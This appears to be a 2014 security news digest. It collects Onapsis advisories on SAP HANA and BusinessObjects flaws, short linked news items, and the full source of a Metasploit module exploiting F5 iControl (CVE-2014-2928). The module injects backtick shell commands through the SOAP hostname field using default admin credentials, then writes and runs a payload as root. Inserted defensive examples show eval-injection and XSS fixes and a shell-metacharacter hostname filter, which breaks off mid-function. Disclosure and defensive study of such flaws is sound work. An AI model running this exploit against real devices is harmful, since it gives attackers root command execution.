
[Onapsis Security Advisory 2014-033] SAP Business Warehouse Missing Authorization Check

Onapsis Security Advisory 2014-033: SAP Business Warehouse Missing
Authorization Check

1. Impact on Business
=====================

By exploiting this vulnerability, an authenticated attacker would be able
to abuse functionality that should be restricted and to disclose
technical information without having the required access permissions.
This information could be used to perform further attacks against the
platform.

Risk Level: Low


2. Advisory Information
=======================

- Public Release Date: 2014-10-08

- Subscriber Notification Date: 2014-10-08

- Last Revised: 2014-08-17

- Security Advisory ID: ONAPSIS-2013-033

- Onapsis SVS ID: ONAPSIS-00114

- Researcher: Nahuel D. Sánchez

- Initial Base CVSS v2: 3.5 (AV:N/AC:M/AU:S/C:P/I:N/A:N)


3. Vulnerability Information
============================

- Vendor: SAP

- Affected Components:

  - SAP NetWeaver AS ABAP 7.31
    (Check SAP Note 1967780 for detailed information on affected releases)

- Vulnerability Class: Improper Authorization (CWE-285)

- Remotely Exploitable: Yes

- Locally Exploitable: No

- Authentication Required: Yes

- Detection Module available in Onapsis X1: Yes

- BizRisk Illustration Module available in Onapsis X1: Yes

- Original Advisory:
  http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-033


4. Affected Components Description
==================================

SAP NetWeaver Business Warehouse is a platform that provides business
intelligence, analytical, reporting and data warehousing capabilities.
It is often used by companies who run their business on SAP's
operational systems. BW is part of the SAP NetWeaver platform.


5. Vulnerability Details
========================

The RFC function 'RSDU_CCMS_GET_PROFILE_PARAM' does not perform any
authorization check prior to retrieving the profile parameter value.


6. Solution
===========

SAP has released SAP Note 1967780, which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/1967780.

Onapsis strongly recommends that SAP customers download the related
security fixes and apply them to the affected components in order to
reduce business risk.


7. Report Timeline
==================

2014-01-20: Onapsis provides vulnerability information to SAP AG.
2014-01-21: SAP confirms receipt of the vulnerability information.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis announces availability of the security advisory.


About Onapsis Research Labs
===========================

Onapsis Research Labs provides industry analysis of key security issues
that impact business-critical systems and applications. Delivering
frequent and timely security and compliance advisories with associated
risk levels, Onapsis Research Labs combines in-depth knowledge and
experience to deliver technical and business context, with sound
security judgment, to the broader information security community.


About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis gives every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business: critical applications that house vital data and run
business processes.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool which delivers enterprise vulnerability,
compliance, detection and response capabilities with analytics.
The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.
For further information about our solutions, please contact us at
info@onapsis.com and visit our website at www.onapsis.com.

[Onapsis Security Advisory 2014-031] SAP Business Objects Information Disclosure via CORBA

Onapsis Security Advisory 2014-031: SAP Business Objects Information
Disclosure via CORBA


1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would
be able to obtain information about the system that could be used to
further specialize attacks against the Business Objects platform.

Risk Level: Low


2. Advisory Information
=======================

- Public Release Date: 2014-10-08

- Subscriber Notification Date: 2014-10-08

- Last Revised: 2014-09-17

- Security Advisory ID: ONAPSIS-2014-031

- Onapsis SVS ID: ONAPSIS-00091

- Researcher: Will Vandevanter

- Initial Base CVSS v2: 3.5 (AV:N/AC:M/AU:S/C:P/I:N/A:N)


3. Vulnerability Information
============================

- Vendor: SAP

- Affected Components:

  - SAP BusinessObjects Edge 4.0
    (Check SAP Note 1998990 for detailed information on affected releases)

- Vulnerability Class: Improper Authorization (CWE-285)

- Remotely Exploitable: Yes

- Locally Exploitable: No

- Authentication Required: Yes

- Detection Module available in Onapsis X1: Yes

- BizRisk Illustration Module available in Onapsis X1: Yes

- Original Advisory:
  http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-031


4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

Business Objects CORBA listeners include the ability to run
unauthenticated InfoStore queries via CORBA. Although some authorization
is enforced, it is possible to obtain a considerable amount of
information by making requests to the InfoStore via CORBA.


6. Solution
===========

SAP has released SAP Note 1998990, which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/1998990.

Onapsis strongly recommends that SAP customers download the related
security fixes and apply them to the affected components in order to
reduce business risk.


7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-01-17: SAP confirms receipt of the vulnerability information.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis announces availability of the security advisory.



[Onapsis Security Advisory 2014-027] SAP HANA Multiple Reflected Cross Site Scripting Vulnerabilities

Onapsis Security Advisory 2014-027: SAP HANA Multiple Reflected Cross
Site Scripting Vulnerabilities

1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would
be able to attack other users of the system.

Risk Level: Medium


2. Advisory Information
=======================

- Public Release Date: 2014-10-08

- Subscriber Notification Date: 2014-10-08

- Last Revised: 2014-09-17

- Security Advisory ID: ONAPSIS-2014-027

- Onapsis SVS ID: ONAPSIS-00122, ONAPSIS-00125

- Researcher: Will Vandevanter

- Initial Base CVSS v2: 4.3 (AV:N/AC:M/AU:N/C:N/I:P/A:N)


3. Vulnerability Information
============================

- Vendor: SAP

- Affected Components:

  - HANA Developer Edition, Release 70 (tested on 1.00.70.00.386119)
    (Check SAP Note 2009696 for detailed information on affected releases)

- Vulnerability Class: Improper Neutralization of Input During Web
  Page Generation - Cross-site Scripting (CWE-79)

- Remotely Exploitable: Yes

- Locally Exploitable: No

- Authentication Required: No

- Detection Module available in Onapsis X1: Yes

- BizRisk Illustration Module available in Onapsis X1: Yes

- Original Advisory:
  http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-027


4. Affected Components Description
==================================

SAP HANA is a platform for real-time business. It combines database,
data processing, and application platform capabilities in-memory. The
platform provides libraries for predictive, planning, text processing,
spatial, and business analytics.


5. Vulnerability Details
========================

The SAP HANA Developer Edition contains multiple reflected cross-site
scripting (XSS) vulnerabilities in the democontent area, specifically on
the pages:

/sap/hana/democontent/epm/admin/DataGen.xsjs
/sap/hana/democontent/epm/services/multiply.xsjs

A reflected cross-site scripting attack can be used to non-permanently
deface or modify displayed content from a web site. Reflected cross-site
scripting can also be used to steal another user's authentication
information, such as data relating to their current session. An attacker
who gains access to this data may use it to impersonate the user and
access all information with the same rights as the target user. If an
administrator is impersonated, the security of the application may be
fully compromised.



6. Solution
===========

SAP has released SAP Note 2009696, which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2009696.

Onapsis strongly recommends that SAP customers download the related
security fixes and apply them to the affected components in order to
reduce business risk.


7. Report Timeline
==================

2014-03-05: Onapsis provides vulnerability information to SAP AG.
2014-03-06: SAP confirms receipt of the vulnerability information.
2014-05-13: SAP releases security patches.
2014-10-08: Onapsis announces availability of the security advisory.




[Onapsis Security Advisory 2014-028] SAP HANA Web-based Development Workbench Code Injection

Onapsis Security Advisory 2014-028: SAP HANA Web-based Development
Workbench Code Injection

1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would
be able to completely compromise the SAP system and any information
processed and stored in that system.

Risk Level: High


2. Advisory Information
=======================

- Public Release Date: 2014-10-08

- Subscriber Notification Date: 2014-10-08

- Last Revised: 2014-09-17

- Security Advisory ID: ONAPSIS-2013-028

- Onapsis SVS ID: ONAPSIS-00119

- Researcher: Will Vandevanter

- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)

3. Vulnerability Information
============================

- Vendor: SAP

- Affected Components:

  - HANA Developer Edition
  - HANA versions which include the Developer IDE
    (Check SAP Note 2015446 for detailed information on affected releases)

- Vulnerability Class: Improper Neutralization of Directives in
  Dynamically Evaluated Code ('Eval Injection') (CWE-95)

- Remotely Exploitable: Yes

- Locally Exploitable: No

- Authentication Required: Yes

- Detection Module available in Onapsis X1: Yes

- BizRisk Illustration Module available in Onapsis X1: Yes

- Original Advisory:
  http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-028


4. Affected Components Description
==================================

SAP HANA is a platform for real-time business. It combines database,
data processing, and application platform capabilities in-memory. The
platform provides libraries for predictive, planning, text processing,
spatial, and business analytics.


5. Vulnerability Details
========================

HANA Developer Edition contains a code injection vulnerability.
Specifically, the page /sap/hana/ide/core/base/server/net.xsjs
contains an eval call whose input is attacker-controlled. This allows an
authenticated attacker to run arbitrary XSJS code in the context of the
logged-in user.
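The defect class behind this finding, shown as an added example in plain JavaScript rather than SAP's own net.xsjs code: an operation name taken from the request is spliced into source text and evaluated, beside a dispatcher that never evaluates request data as code. The request object mirrors the shape of the XSJS `$.request.parameters.get()` accessor, but `makeRequest()`, the `operations` table and its results are assumptions made for this example.

```javascript
// Added example, not SAP's net.xsjs code. Shows CWE-95 (eval injection) in
// plain JavaScript: a vulnerable dispatcher that evaluates request-supplied
// text, and a hardened one that looks the operation up in an allowlist.

// Hypothetical stand-in for the XSJS request object ($.request.parameters.get).
function makeRequest(params) {
  return { parameters: { get: (key) => params[key] } };
}

// Hypothetical server-side operations a network helper page might expose.
const operations = {
  ping: (host) => ({ host, alive: true }),             // constructed result
  resolve: (host) => ({ host, address: "192.0.2.1" }), // constructed result
};

// Vulnerable dispatcher: "op" becomes part of the evaluated source, so any
// JavaScript supplied in that parameter executes server-side with the
// privileges of the logged-in user.
function dispatchVulnerable(req) {
  const op = req.parameters.get("op");
  const arg = req.parameters.get("arg");
  return eval("operations." + op + "(" + JSON.stringify(arg) + ")");
}

// Hardened dispatcher: accept only own properties of the allowlist (so
// inherited names such as "constructor" are rejected), validate the argument
// against the hostname grammar it is meant to carry, and call the function
// directly. No request string ever reaches eval.
const HOSTNAME_RE = /^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})$/;

function dispatchSafe(req) {
  const op = req.parameters.get("op");
  const arg = req.parameters.get("arg");
  if (typeof op !== "string" || !Object.prototype.hasOwnProperty.call(operations, op)) {
    return { status: 400, error: "unknown operation" };
  }
  if (typeof arg !== "string" || !HOSTNAME_RE.test(arg)) {
    return { status: 400, error: "invalid argument" };
  }
  return { status: 200, body: operations[op](arg) };
}

// Both dispatchers handle a well-formed request identically; only the safe
// one refuses an "op" value that is not an allowlisted operation name.
function demo() {
  const good = makeRequest({ op: "ping", arg: "db.example.internal" });
  const bad = makeRequest({ op: "constructor", arg: "x" });
  return {
    vulnerable: dispatchVulnerable(good),
    safe: dispatchSafe(good),
    rejected: dispatchSafe(bad),
  };
}

console.log(demo());
```

The fix is structural rather than a filter on the input: once the only way to reach an operation is a property lookup on a fixed table, there is no string for an attacker to shape, and the remaining validation concerns the argument's own grammar.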


6. Solution
===========

SAP has released SAP Note 2015446, which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2015446.

Onapsis strongly recommends that SAP customers download the related
security fixes and apply them to the affected components in order to
reduce business risk.


7. Report Timeline
==================

2014-02-25: Onapsis provides vulnerability information to SAP AG.
2014-02-26: SAP confirms receipt of the vulnerability information.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis announces availability of the security advisory.




[Onapsis Security Advisory 2014-030] SAP Business Objects Denial of Service via CORBA

Onapsis Security Advisory 2014-030: SAP Business Objects Denial of
Service via CORBA


1. Impact on Business
=====================

By exploiting this vulnerability, a remote unauthenticated attacker would
be able to completely shut down the SAP Business Objects server.

Risk Level: High


2. Advisory Information
=======================

- Public Release Date: 2014-10-08

- Subscriber Notification Date: 2014-10-08

- Last Revised: 2014-09-17

- Security Advisory ID: ONAPSIS-2014-030

- Onapsis SVS ID: ONAPSIS-00108

- Researcher: Will Vandevanter

- Initial Base CVSS v2: 7.1 (AV:N/AC:M/AU:N/C:N/I:N/A:C)


3. Vulnerability Information
============================

- Vendor: SAP

- Affected Components:

  - BusinessObjects Edge 4.0
    (Check SAP Note 2001106 for detailed information on affected releases)

- Vulnerability Class: Improper Authorization (CWE-285)

- Remotely Exploitable: Yes

- Locally Exploitable: No

- Authentication Required: No

- Detection Module available in Onapsis X1: Yes

- BizRisk Illustration Module available in Onapsis X1: Yes

- Original Advisory:
  http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-030


4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

The CMS CORBA listener includes functions in the OSCAFactory::Session
ORB that allow any user to remotely shut down that Business Objects
server without authentication.


6. Solution
===========

SAP has released SAP Note 2001106, which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2001106.

Onapsis strongly recommends that SAP customers download the related
security fixes and apply them to the affected components in order to
reduce business risk.


7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-01-17: SAP confirms receipt of the vulnerability information.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis announces availability of the security advisory.



[Onapsis Security Advisory 2014-032] SAP BusinessObjects Persistent Cross Site Scripting

Onapsis Security Advisory 2014-032: SAP BusinessObjects Persistent Cross
Site Scripting

1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would
be able to attack other users of the system.

Risk Level: Medium

2. Advisory Information
=======================

- Public Release Date: 2014-10-08

- Subscriber Notification Date: 2014-10-08

- Last Revised: 2014-09-17

- Security Advisory ID: ONAPSIS-2013-032

- Onapsis SVS ID: ONAPSIS-00085

- Researcher: Will Vandevanter

- Initial Base CVSS v2: 3.5 (AV:N/AC:M/AU:S/C:N/I:P/A:N)

3. Vulnerability Information
============================

- Vendor: SAP

- Affected Components:

  - BusinessObjects Edge 4.0
    (Check SAP Note 1941562 for detailed information on affected releases)

- Vulnerability Class: Improper Neutralization of Input During Web
  Page Generation - Persistent Cross-site Scripting (CWE-79)

- Remotely Exploitable: Yes

- Locally Exploitable: No

- Authentication Required: Yes

- Detection Module available in Onapsis X1: Yes

- BizRisk Illustration Module available in Onapsis X1: Yes

- Original Advisory:
  http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-032


4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

BusinessObjects BI "Send to Inbox" functionality can be abused by an
attacker, allowing them to modify displayed application content without
authorization, and to potentially obtain authentication information from
other legitimate users.
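Both this persistent XSS finding and the reflected XSS finding in advisory 2014-027 come down to the same defect: text that a user controls (a stored "Send to Inbox" message, or a URL parameter on a democontent page) is written into an HTML response without output encoding. The following is an added example in plain JavaScript, not code from the advisories or from SAP; the page templates, the `<xsstest>` probe marker and the `isReflectedUnencoded()` check are constructed for this illustration.

```javascript
// Added example, not Onapsis or SAP code. A renderer that writes
// user-controlled text into HTML verbatim, the same renderer with output
// encoding, and a check that tells the two apart from the response alone.

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Encode the five characters that can break out of HTML text or a quoted
// attribute. This is the minimum contextual encoding for HTML body content;
// values placed into URLs, JavaScript, or CSS need their own encoders.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable renderer (hypothetical page): the value is interpolated as-is,
// so any markup in it becomes part of the page served to the next viewer.
function renderVulnerable(displayName) {
  return `<html><body><h1>Message from ${displayName}</h1></body></html>`;
}

// Hardened renderer: same page, value encoded at the point of output.
function renderSafe(displayName) {
  return `<html><body><h1>Message from ${escapeHtml(displayName)}</h1></body></html>`;
}

// Detection check: submit a benign marker containing '<' and '>' and see
// whether it comes back untouched. A defender does not need a working
// payload to confirm missing encoding; surviving angle brackets are enough.
const PROBE = "<xsstest>"; // constructed marker

function isReflectedUnencoded(render, probe = PROBE) {
  return render(probe).includes(probe);
}

function demo() {
  return {
    vulnerable: isReflectedUnencoded(renderVulnerable), // true
    safe: isReflectedUnencoded(renderSafe),             // false
    encoded: escapeHtml('Tom & "Jerry" <admin>'),
  };
}

console.log(demo());
```

For stored XSS the encoding still belongs at output time, not at storage time: the same message may later be rendered into a different context (a JSON API, an e-mail, a report), and encoding on the way in breaks those consumers while protecting only the one view the developer had in mind.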

6. Solution
===========

SAP has released SAP Note 1941562, which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/1941562.

Onapsis strongly recommends that SAP customers download the related
security fixes and apply them to the affected components in order to
reduce business risk.


7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-01-17: SAP confirms receipt of the vulnerability information.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis announces availability of the security advisory.




[Onapsis Security Advisory 2014-029] SAP Business Objects Information Disclosure

Onapsis Security Advisory 2014-029: SAP Business Objects Information
Disclosure


1. Impact on Business
=====================

A malicious user can discover information relating to valid users
using a vulnerable Business Objects Enterprise instance. This
information could be used to allow the malicious user to specialize
their attacks against the system.

Risk Level: Medium


2. Advisory Information
=======================

- Public Release Date: 2014-09-18

- Subscriber Notification Date: 2014-10-08

- Last Revised: 2014-09-18

- Security Advisory ID: ONAPSIS-2014-029

- Onapsis SVS ID: ONAPSIS-00072

- Researcher: Will Vandevanter

- Initial Base CVSS v2: 5.0 (AV:N/AC:L/AU:N/C:P/I:N/A:N)


3. Vulnerability Information
============================

- Vendor: SAP

- Affected Components:

  - BusinessObjects Edge 4.0
  - BOXI R2
  - BOXI 3.1
    (Check SAP Note 2001109 for detailed information on affected releases)

- Vulnerability Class: Information Exposure Through Timing Discrepancy
  (CWE-208)

- Remotely Exploitable: Yes

- Locally Exploitable: No

- Authentication Required: No

- Detection Module available in Onapsis X1: Yes

- BizRisk Illustration Module available in Onapsis X1: Yes

- Original Advisory:
  http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-029


4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

The vulnerability could be exploited by sending a web services request
to the Session web service and attempting SecEnterprise authentication.
By timing the replies from the remote server, an attacker can distinguish
existing from non-existent users. Specifically, an authentication attempt
using an existing username causes the server to take longer to respond
than an attempt using a username that does not exist.

6. Solution
===========

SAP has released SAP Note 2001109, which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2001109.

Onapsis strongly recommends that SAP customers download the related
security fixes and apply them to the affected components in order to
reduce business risk.



7. Report Timeline
==================

2013-08-29: Onapsis provides vulnerability information to SAP AG.
2013-08-30: SAP confirms receipt of the vulnerability information.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis announces availability of the security advisory.




Twitter Sues DOJ to Open Up Data Request Disclosures

Twitter has escalated the battle against the US government's data disclosure policies and has sued the US Department of Justice (DOJ). Unlike other high-profile tech firms, which explicitly agreed to governmental restrictions on disclosures via an earlier settlement, Twitter feels that the current restrictions are unconstitutional and should be fought.

more here..........http://windowsitpro.com/paul-thurrotts-wininfo/twitter-sues-doj-open-data-request-disclosures

Cuckoo Sandbox Evasion PoC available

At the beginning of this week we discovered a security flaw in the famous malware analysis framework „Cuckoo Sandbox“. We disclosed this bug to the developers on the 7th of October 2014. Not even three hours later the patch was verified and the updates were supplied by the developers.
The Cuckoo Sandbox Team already did a short write-up to explain the nature of the bug: cuckoosandbox.org/2014-10-07-cuckoo-sandbox-111.html
We will provide a more detailed explanation and a simple proof-of-concept to exploit this bug. We recommend updating to the latest Cuckoo Sandbox version.

more here.........https://blog.gdatasoftware.com/blog/article/cuckoo-sandbox-evasion-poc-available.html

Sednit espionage group now using custom exploit kit

For at least five years the Sednit group has been relentlessly attacking various institutions, most notably in Eastern Europe. The group used several advanced pieces of malware for these targeted attacks, in particular the one we named Win32/Sednit, also known as Sofacy.

We recently came across cases of legitimate financial websites being redirected to a custom exploit kit. Based on our research and on some information provided by the Google Security Team, we were able to establish that it is used by the Sednit group. This is a new strategy for this group which has relied mostly on spear-phishing emails up until now.

In this blog, we will first examine recent cases of spear-phishing emails using the CVE-2014-1761 Microsoft Word exploit. We will then focus on the exploit kit, which appears to still be in a development and testing phase, and briefly describe the actual payload.

more here.........http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/

Timestomp MFT Shenanigans

I was working a case a while back and I came across some malware that had time stomping capabilities. There have been numerous posts written on how to use the MFT as a means to determine if time stomping has occurred, so I won't go into too much detail here.

more here.......http://az4n6.blogspot.com/2014/10/timestomp-mft-shenanigans.html

Tsunami SYN Flood Attack – A New Trend in DDoS Attacks?

Over the past week Radware’s Emergency Response Team (ERT) detected a new type of SYN flood which is believed to be specially designed to overcome most of today’s security defenses with a TCP-based volume attack. Within a 48-hour period two different targets on two different continents were targeted with this new technique and experienced very high attack volumes.

more here.............http://blog.radware.com/security/2014/10/tsunami-syn-flood-attack/

FBI Pays Visit to Researcher Who Revealed Yahoo Hack

Jonathan Hall was trying to help the internet. Earlier this week, the 29-year-old hacker and security consultant revealed that someone had broken into machines running inside several widely used internet services, including Yahoo, WinZip, and Lycos. But he may have gone too far.

Hall—the president of a security firm called Future South Technologies—went out of his way to spotlight a network of compromised computer servers that, he says, are controlled by Romanian hackers. He published his findings on his blog, saying he simply wanted to help these companies clean up a nasty computer problem. But with his aggressive investigation, he may have run afoul of the nation’s anti-hacking law, the Computer Fraud and Abuse Act, or CFAA.

more here.............http://www.wired.com/2014/10/shellshockresearcher/

SPHINCS: practical stateless hash-based signatures

SPHINCS-256 is a high-security post-quantum stateless hash-based signature scheme that signs hundreds of messages per second on a modern 4-core 3.5GHz Intel CPU. Signatures are 41 KB, public keys are 1 KB, and private keys are 1 KB. SPHINCS-256 is designed to provide long-term 2^128 security even against attackers equipped with quantum computers. Unlike most hash-based signature schemes, SPHINCS-256 is stateless, allowing it to be a drop-in replacement for current signature schemes.

more here...........http://sphincs.cr.yp.to/index.html

Multiple Vulnerabilities in Cisco ASA Software

Cisco Adaptive Security Appliance (ASA) Software is affected by the following vulnerabilities

more here.............http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141008-asa

The Horror of a 'Secure Golden Key'

This week, the Washington Post's editorial board, in a widely circulated call for “compromise” on encryption, proposed that while our data should be off-limits to hackers and other bad actors, “perhaps Apple and Google could invent a kind of secure golden key” so that the good guys could get to it if necessary.

This theoretical “secure golden key” would protect privacy while allowing privileged access in cases of legal or state-security emergency. Kidnappers and terrorists are exposed, and the rest of us are safe. Sounds nice. But this proposal is nonsense, and, given the sensitivity of the issue, highly dangerous. Here’s why.

more here...........https://keybase.io/blog/2014-10-08/the-horror-of-a-secure-golden-key

The malware of the future may come bearing real gifts

“What,” asked the speaker, “if Notepad behaved just like you would expect it to, but only for the first hour or so that you used it? What if it began to do different things after that?”

According to Giovanni Vigna, a professor at the University of California in Santa Monica and the head of the Center for CyberSecurity and Seclab there, such possum-like behaviour and long-term thinking represents the future of the malware arms race.

Speaking at IP Expo today, Prof. Vigna outlined scenarios in which an increasingly sophisticated and opaque breed of malicious executable will evolve to ‘mimic’ the behaviour patterns of benign software, in an attempt to avoid wasting its payload behaviour on a sandbox or virtualised environment.

more here.........http://thestack.com/mimicry-in-malware-giovanni-vigna-081014

Metasploit: F5 iControl Remote Root Command Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "F5 iControl Remote Root Command Execution",
      'Description'    => %q{
        This module exploits an authenticated remote command execution
        vulnerability in the F5 BIGIP iControl API (and likely other
        F5 devices).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bperry' # Discovery, Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2014-2928'],
          ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['F5 iControl', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Sep 17 2013",
      'DefaultTarget'  => 0))

      register_options(
        [
          Opt::RPORT(443),
          OptBool.new('SSL', [true, 'Use SSL', true]),
          OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
          OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
          OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
        ], self.class)
  end

  def check
    get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Body>
    <n1:get_hostname xmlns:n1="urn:iControl:System/Inet" />
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
    }

    # Read the current hostname so it can be put back after the probe.
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
      'method' => 'POST',
      'data' => get_hostname,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })

    unless res && res.body =~ /y:string">(.*)<\/return/
      return Exploit::CheckCode::Unknown
    end
    hostname = $1

    # Probe: set the hostname to `whoami`.a.b. If the backticks are evaluated
    # by a root shell, the hostname reads back as "root.a.b".
    send_cmd("whoami")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
      'method' => 'POST',
      'data' => get_hostname,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })

    unless res && res.body =~ /y:string">(.*)<\/return/
      return Exploit::CheckCode::Unknown
    end
    new_hostname = $1

    if new_hostname == "root.a.b"
      # Restore the original hostname so the probe leaves the device as found.
      pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
        <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
        <SOAP-ENV:Body>
        <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
        <hostname>#{hostname}</hostname>
        </n1:set_hostname>
        </SOAP-ENV:Body>
        </SOAP-ENV:Envelope>
      }

      send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
        'method' => 'POST',
        'data' => pay,
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      })

      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def send_cmd(cmd)
    pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
      <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
      <SOAP-ENV:Body>
      <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
        <hostname>`#{cmd}`.a.b</hostname>
        </n1:set_hostname>
        </SOAP-ENV:Body>
        </SOAP-ENV:Envelope>
    }

    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
      'method' => 'POST',
      'data' => pay,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    })
  end

  def exploit
    filename = Rex::Text.rand_text_alpha_lower(5)

    # Each set_hostname call can only carry a short command, so the payload is
    # appended to /tmp/<filename> five bytes at a time; base64 keeps the
    # hostname free of characters the SOAP body or the shell would mangle.
    print_status('Sending payload in chunks, might take a small bit...')
    i = 0
    while i < payload.encoded.length
      cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}"
      send_cmd(cmd)
      i = i + 5
    end

    print_status('Triggering payload...')

    send_cmd("sh /tmp/#{filename}")
  end
end
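A filter for the injection point the module above abuses, added here as an example; it is neither F5's code nor part of the Metasploit module. It pulls the hostname out of a System/Inet set_hostname envelope, decodes XML entities so a backtick written as &#96; is judged as the character the device will see, rejects shell metacharacters, and then checks RFC 1123 hostname syntax. The envelopes in SAMPLES are constructed for this example, and the regex extraction is a dependency-free stand-in for a real XML parser.

```ruby
require 'cgi'

# RFC 1123 label: letters, digits and hyphens, 1-63 chars, no leading or
# trailing hyphen. A hostname is one or more such labels joined by dots.
LABEL_RE = /\A[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\z/
SHELL_META_RE = /[`$;|&<>(){}\n\r]/

def valid_hostname?(name)
  return false if name.nil? || name.empty? || name.length > 253
  name.split('.', -1).all? { |label| label =~ LABEL_RE }
end

# Pull the <hostname> value out of a System/Inet set_hostname envelope.
# Regex extraction keeps the example dependency-free; a production filter
# should parse the XML properly. Entities are decoded so that &#96; is seen
# as the backtick the server will evaluate.
def extract_set_hostname(body)
  return nil unless body =~ /<\w+:set_hostname\b/
  m = body.match(%r{<hostname>(.*?)</hostname>}m)
  m && CGI.unescapeHTML(m[1])
end

# Verdict for one request body: [:ignore, nil] when it is not a set_hostname
# call, [:block, reason] when the value is unsafe, [:allow, hostname] otherwise.
def inspect_request(body)
  host = extract_set_hostname(body)
  return [:ignore, nil] if host.nil?
  return [:block, "shell metacharacters in hostname #{host.inspect}"] if host =~ SHELL_META_RE
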